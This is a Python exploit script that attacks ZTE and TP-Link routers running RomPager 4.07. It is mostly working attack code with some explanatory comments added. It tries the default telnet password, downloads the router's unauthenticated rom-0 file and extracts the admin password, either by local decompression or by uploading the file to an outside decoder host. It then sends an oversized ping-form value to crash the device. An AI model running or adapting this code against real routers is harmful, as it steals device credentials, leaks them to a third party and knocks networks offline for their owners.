ZTE and TP-Link RomPager - DoS Exploit
- #!/usr/bin/env python
- # -*- coding: utf-8 -*-
- # Exploit Title: ZTE and TP-Link RomPager DoS Exploit
- # Date: 10-05-2014
- # Server Version: RomPager/4.07 UPnP/1.0
- # Tested Routers: ZTE ZXV10 W300
- # TP-Link TD-W8901G
- # TP-Link TD-W8101G
- # TP-Link TD-8840G
- # Firmware: FwVer:3.11.2.175_TC3086 HwVer:T14.F7_5.0
- # Tested on: Kali Linux x86
- #
- # Notes: Please note this exploit may contain errors, and
- # is provided "as is". There is no guarantee
- # that it will work on your target router(s), as
- # the code may have to be adapted.
- # This is to avoid script kiddie abuse as well.
- #
- # Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
- # Author takes no responsibility for any kind of damage you cause.
- #
- # Exploit Author: Osanda Malith Jayathissa (@OsandaMalith)
- #
- # Original write-up: https://osandamalith.wordpress.com/2014/06/10/zte-and-tp-link-rompager-dos/
- # Video: https://www.youtube.com/watch?v=1fSECo2ewoo
- # Dedicate to Nick Knight and Hood3dRob1n
- #
- # ./dos.py -i 192.168.1.1
- import os
- import re
- import sys
- import time
- import urllib
- import base64
- import httplib
- import urllib2
- import requests
- import optparse
- import telnetlib
- import subprocess
- import collections
- import unicodedata
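class BitReader:
    """MSB-first bit cursor over a sequence of bytes.

    Accepts either a ``str`` of single-character elements (a Python 2
    file read) or a sequence of ints 0..255 (``bytes``/``bytearray``, or a
    list of ints). Each element contributes eight booleans, most
    significant bit first; reads consume from the front.
    """

    def __init__(self, bytes):
        self._bits = collections.deque()
        for raw in bytes:
            # str elements are 1-char strings, int sequences are already numbers
            value = raw if isinstance(raw, int) else ord(raw)
            for n in range(8):
                self._bits.append(bool((value >> (7 - n)) & 1))

    def getBit(self):
        """Consume and return the next bit; raises IndexError when none remain."""
        return self._bits.popleft()

    def getBits(self, num):
        """Consume *num* bits and return them as an unsigned int, first bit most significant.

        ``num`` of 0 returns 0 without consuming anything.
        """
        res = 0
        for _ in range(num):
            res = (res << 1) | int(self.getBit())
        return res

    def getByte(self):
        """Consume the next eight bits as one unsigned byte value."""
        return self.getBits(8)

    def __len__(self):
        """Number of bits not yet consumed."""
        return len(self._bits)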
class RingList:
    """Fixed-capacity FIFO window backed by a deque.

    After ``length`` appends the window is marked full and each further
    append evicts the oldest item first. Indexing follows deque rules
    (negative indices count back from the newest item); a non-negative
    index at or past the current size yields None rather than raising.
    """

    def __init__(self, length):
        self.__data__ = collections.deque()
        self.__full__ = False
        self.__max__ = length

    def append(self, x):
        """Add *x*, evicting the oldest item first once the window is full."""
        items = self.__data__
        if self.__full__:
            items.popleft()
        items.append(x)
        # once the capacity is reached the flag stays set for good
        self.__full__ = self.__full__ or len(items) == self.__max__

    def get(self):
        """Return the underlying deque itself (not a copy)."""
        return self.__data__

    def size(self):
        """Number of items currently held."""
        return len(self.__data__)

    def maxsize(self):
        """Capacity the window was created with."""
        return self.__max__

    def __getitem__(self, n):
        return None if n >= self.size() else self.__data__[n]
def filter_non_printable(str):
    """Drop control characters below 0x20, keeping TAB (0x09).

    Only code points above 31 (plus TAB) survive, so DEL (0x7f) and any
    non-ASCII character pass through unchanged.
    """
    def keep(ch):
        code = ord(ch)
        return code == 9 or code > 31
    return ''.join(filter(keep, str))
def banner():
    """Return the start-up ASCII-art banner, with a leading and a trailing newline."""
    art = [
        "\t\t _/_/_/ _/_/_/",
        "\t\t _/ _/ _/_/ _/",
        "\t\t _/ _/ _/ _/ _/_/",
        "\t\t _/ _/ _/ _/ _/",
        "\t\t_/_/_/ _/_/ _/_/_/",
    ]
    return "\n" + "\n".join(art) + "\n"
def dos(host, password):
    """POST one oversized ping-test form to the router's admin UI and report whether it stopped answering.

    Authenticates with HTTP Basic as admin/*password*, sets ``PingIPAddr``
    to 2000 bytes of 'A', waits at most 1 s for a reply, and on any
    exception (including the SystemExit raised by the ``sys.exit`` inside
    the ``try``) asks ``checkHost`` whether the device still answers ping.

    For defenders: the request is a POST to ``/Forms/tools_test_1`` whose
    ``PingIPAddr`` value is far longer than any address; an admin
    interface reachable from untrusted networks is the exposure it relies on.
    """
    while (1):
        url = 'http://' +host+ '/Forms/tools_test_1'
        parameters = {
            'Test_PVC' : 'PVC0',
            'PingIPAddr' : '\101'*2000,        # '\101' is octal 65, i.e. 'A'
            'pingflag' : '1',
            'trace_open_flag' : '0',
            'InfoDisplay' : '+-+Info+-%0D%0A'   # already percent-encoded; urlencode below encodes the '%' once more
        }
        params = urllib.urlencode(parameters)
        req = urllib2.Request(url, params)      # supplying a body makes this a POST
        # strip the line breaks encodestring inserts before using the value in a header
        base64string = base64.encodestring('%s:%s' % ('admin', password)).replace('\n', '')
        req.add_header("Authorization", "Basic %s" %base64string)
        req.add_header("Content-type", "application/x-www-form-urlencoded")
        req.add_header("Referer", "http://" +host+ "/maintenance/tools_test.htm")
        try:
            print '[~] Sending Payload'
            response = urllib2.urlopen(req, timeout=1)   # the response body is never read
            sys.exit(0)   # SystemExit is caught by the bare except below, so the host check always runs
        except:
            flag = checkHost(host)
            if flag == 0:
                print '[+] The host is still up and running'
            else:
                print '[~] Success! The host is down'
                sys.exit(0)
        break   # the loop body only ever executes once
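def checkHost(host):
    """Ping *host* twice and return 0 if it answered, None otherwise.

    The command is handed to subprocess as an argument list with the shell
    disabled, so the *host* string (taken verbatim from the ``-i`` option)
    cannot smuggle extra shell commands into the ping invocation. Output
    is discarded; only the exit status of ping is used.
    """
    count_flag = "-n" if sys.platform == "win32" else "-c"
    cmd = ["ping", count_flag, "2", host]
    try:
        with open(os.devnull, "wb") as sink:
            rc = subprocess.call(cmd, stdout=sink, stderr=subprocess.STDOUT)
    except OSError:
        # ping binary missing or not executable: treat as "no answer"
        return None
    if rc != 0:
        return None
    time.sleep(1)   # short pause before the caller issues its next probe
    return 0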
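def checkServer(host):
    """Fetch ``/status.html`` over HTTP and return 0 if the Server header is exactly 'RomPager/4.07 UPnP/1.0', else 1.

    The connection is closed in a ``finally`` so a failed request (refused
    port, reset, hang) does not leak the socket; such failures still
    propagate to the caller as exceptions.
    """
    connexion = httplib.HTTPConnection(host)
    try:
        connexion.request("GET", "/status.html")
        response = connexion.getresponse()
        server = response.getheader("server")   # header-name lookup is case-insensitive in httplib
    finally:
        connexion.close()
    time.sleep(2)
    return 0 if server == 'RomPager/4.07 UPnP/1.0' else 1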
def checkPassword(host):
    """Test the default telnet password on *host*, then decide how to obtain the real one and launch ``dos``.

    Logs in over telnet (port 23, 4 s timeout) with 'admin'; if the text
    following the echoed password reads "Copyright", the default is in use
    and ``dos`` runs right away. Otherwise the user chooses between
    ``decodePasswordLocal`` and ``decodePasswordRemote`` to recover the
    password from rom-0 first.

    For defenders: a telnet session on port 23 authenticating with the
    default credential is the observable event; this branch exists only
    because that credential is still set.
    """
    print '[+] Checking for default password'
    defaultpass = 'admin'
    tn = telnetlib.Telnet(host, 23, 4)
    tn.read_until("Password: ")
    tn.write(defaultpass + '\n')
    time.sleep(2)
    banner = tn.read_eager()   # whatever has arrived so far, without blocking; shadows the module-level banner()
    # pattern is five arbitrary characters followed by a word run: presumably skips the echoed
    # 5-char password and captures the next word - TODO confirm against a real login transcript
    banner = regex(len(defaultpass)*r'.'+'\w+' , banner)
    tn.write("exit\n")
    tn.close()
    time.sleep(4)
    if banner == 'Copyright':
        print '[+] Default password is being used'
        dos(host, defaultpass)
    else:
        print '[!] Default Password is not being used'
        while True:
            msg = str(raw_input('[?] Decrypt the rom-0 file locally? ')).lower()
            try:
                if msg[0] == 'y':   # empty input raises IndexError, caught below and re-prompted
                    password = decodePasswordLocal(host)
                    print '[*] Router password is: ' +password
                    dos(host, password)
                    break
                if msg[0] == 'n':
                    password = decodePasswordRemote(host)
                    print '[*] Router password is: ' +password
                    dos(host, password)
                    break
                else:
                    print '[!] Enter a valid choice'
            except Exception, e:
                # any failure in the decoders or in dos() is printed and the prompt repeats
                print e
                continue
def decodePasswordRemote(host):
    """Download the router's rom-0 and submit it to an external decoder site; return the password it reports.

    The whole rom-0 image - the device configuration, including the admin
    credential - is POSTed over plain HTTP to the hard-coded host below,
    so the operator of that server receives the router's secrets. The
    local decoder avoids that third-party dependency.
    """
    fname = 'rom-0'
    if os.path.isfile(fname) == True:
        os.remove(fname)
    urllib.urlretrieve ("http://"+host+"/rom-0", fname)
    # If this URL goes down you might have to find one and change this function.
    # You can also use the local decoder. It might have few errors in getting output.
    url = 'http://198.61.167.113/zynos/decoded.php' # Target URL
    files = {'uploadedfile': open('rom-0', 'rb') } # The rom-0 file we wanna upload; NOTE: this handle is never closed
    data = {'MAX_FILE_SIZE': 1000000, 'submit': 'Upload rom-0'} # Additional Parameters we need to include
    headers = { 'User-agent' : 'Python Demo Agent v1' } # Any additional Headers you want to send or include
    # verify=False is moot for an http:// URL but would silence certificate checks if this were ever changed to https://
    res = requests.post(url, files=files, data=data, headers=headers, allow_redirects=True, timeout=30.0, verify=False )
    res1 =res.content
    p = re.search('rows=10>(.*)', res1)   # scrapes the rest of the line after 'rows=10>' (presumably a <textarea>) from the reply
    if p:
        passwd = found = p.group(1)
    else:
        password = 'NotFound'   # NOTE: assigns 'password', not 'passwd', so the return below raises NameError on this path
    return passwd
def decodePasswordLocal(host):
    """Download the router's rom-0 and decompress the block at offset 8568 to extract the admin password.

    Steps: fetch ``http://<host>/rom-0`` to a local file, read 221 bytes
    from offset 8568, bit-decode them with a literal/back-reference scheme
    (literal byte when the lead bit is 0; otherwise a 7- or 11-bit window
    offset plus a variable-length copy length, a 7-bit offset of 0 ending
    the stream), then cut the text at the first vendor marker and return
    what precedes it. The shape matches an LZ77-family coder (presumably
    the ZynOS rom-0 compression - not verified here).

    For defenders: the password is recoverable because ``/rom-0`` is served
    over unauthenticated HTTP and holds the admin credential in merely
    compressed form; the download of ``/rom-0`` is the observable event.
    """
    # Sometimes this might output a wrong password while finding the exact string.
    # print the result as mentioned below and manually find out
    fname = 'rom-0'
    if os.path.isfile(fname) == True:
        os.remove(fname)
    urllib.urlretrieve ("http://"+host+"/rom-0", fname)
    fpos=8568              # start of the compressed block that holds the credentials
    fend=8788
    fhandle=file('rom-0')  # Python 2 'file' builtin, text mode; NOTE: never closed
    fhandle.seek(fpos)
    chunk="*"              # unused
    amount=221
    while fpos < fend:
        if fend-fpos < amount:
            amount = amount    # no-op: fend-fpos is 220, yet the read below still asks for 221 bytes
        data = fhandle.read(amount)
        fpos += len(data)      # one read pushes fpos past fend, so this outer loop runs exactly once
        reader = BitReader(data)
        result = ''            # rebuilt per chunk, so only the last chunk's text would survive
        window = RingList(2048)   # history window consulted by back-references
        while True:
            bit = reader.getBit()   # raises IndexError if the bits run out before the terminator
            if not bit:
                # literal: the next 8 bits are one byte
                char = reader.getByte()
                result += chr(char)
                window.append(char)
            else:
                bit = reader.getBit()
                if bit:
                    offset = reader.getBits(7)    # short back-reference
                    if offset == 0:
                        break                      # end-of-stream marker
                else:
                    offset = reader.getBits(11)   # long back-reference
                lenField = reader.getBits(2)
                if lenField < 3:
                    lenght = lenField + 2          # copy lengths 2..4
                else:
                    lenField <<= 2
                    lenField += reader.getBits(2)
                    if lenField < 15:
                        # lenField is 12..14 here, so '& 0x0f' leaves it unchanged and lenght comes out as 17..19
                        lenght = (lenField & 0x0f) + 5
                    else:
                        # run of 4-bit nibbles; every 0xF nibble adds 15 to the length
                        lenCounter = 0
                        lenField = reader.getBits(4)
                        while lenField == 15:
                            lenField = reader.getBits(4)
                            lenCounter += 1
                        lenght = 15*lenCounter + 8 + lenField
                for i in xrange(lenght):
                    char = window[-offset]    # byte 'offset' positions back; deque raises IndexError if that is before the data seen so far
                    result += chr(char)
                    window.append(char)
    # keep printable text, interpret leftover backslash escapes, drop anything non-ASCII
    result = filter_non_printable(result).decode('unicode_escape').encode('ascii','ignore')
    # In case the password you see is wrong while filtering, manually print it from here and findout.
    #print result
    # each branch: remove all whitespace, keep the text up to the vendor marker, drop the marker,
    # then drop the first remaining character (presumably a length or separator byte - TODO confirm)
    if 'TP-LINK' in result:
        result = ''.join(result.split()).split('TP-LINK', 1)[0] + 'TP-LINK';
        result = result.replace("TP-LINK", "")
        result = result[1:]
    if 'ZTE' in result:
        result = ''.join(result.split()).split('ZTE', 1)[0] + 'ZTE';
        result = result.replace("ZTE", "")
        result = result[1:]
    if 'tc160' in result:
        result = ''.join(result.split()).split('tc160', 1)[0] + 'tc160';
        result = result.replace("tc160", "")
        result = result[1:]
    return result
def regex(path, text):
    """Return the first substring of *text* matching the pattern *path*, or None if nothing matches."""
    found = re.search(path, text)
    return found.group() if found else None
def main():
    """Command-line entry point: clear the screen, parse ``-i <host>``, then run the probe chain.

    Order of checks: ICMP reachability (``checkHost``), Server-header
    fingerprint (``checkServer``), then ``checkPassword``, which decides
    how credentials are obtained and finally calls ``dos``. Ctrl-C and
    Ctrl-D end the run with a message.
    """
    if sys.platform == 'win32':
        os.system('cls')
    else:
        os.system('clear')
    try:
        print banner()
        print '''
|=--------=[ ZTE and TP-Link RomPager Denial of Service Exploit ]=-------=|\n
[*] Author: Osanda Malith Jayathissa
[*] Follow @OsandaMalith
[!] Disclaimer: This proof of concept is strictly for research, educational or ethical (legal) purposes only.
[!] Author takes no responsibility for any kind of damage you cause.
'''
        parser = optparse.OptionParser("usage: %prog -i <IP Address> ")
        parser.add_option('-i', dest='host',
                          type='string',
                          help='Specify the IP to attack')
        (options, args) = parser.parse_args()
        if options.host is None:
            parser.print_help()
            exit(-1)   # the site-installed exit(), not sys.exit; absent when run with python -S
        host = options.host
        x = checkHost(host)   # 0 when ping succeeded, None otherwise
        if x == 0:
            print '[+] The host is up and running'
            server = checkServer(host)   # 0 only for the exact RomPager/4.07 Server header
            if server == 0:
                checkPassword(host)
            else:
                print ('[!] Sorry the router is not running RomPager')
        else:
            print '[!] The host is not up and running'
            sys.exit(0)
    except KeyboardInterrupt:
        print '[!] Ctrl + C detected\n[!] Exiting'
        sys.exit(0)
    except EOFError:
        print '[!] Ctrl + D detected\n[!] Exiting'
        sys.exit(0)
if __name__ == "__main__":
    main()   # run only when executed as a script, not when imported
- #EOF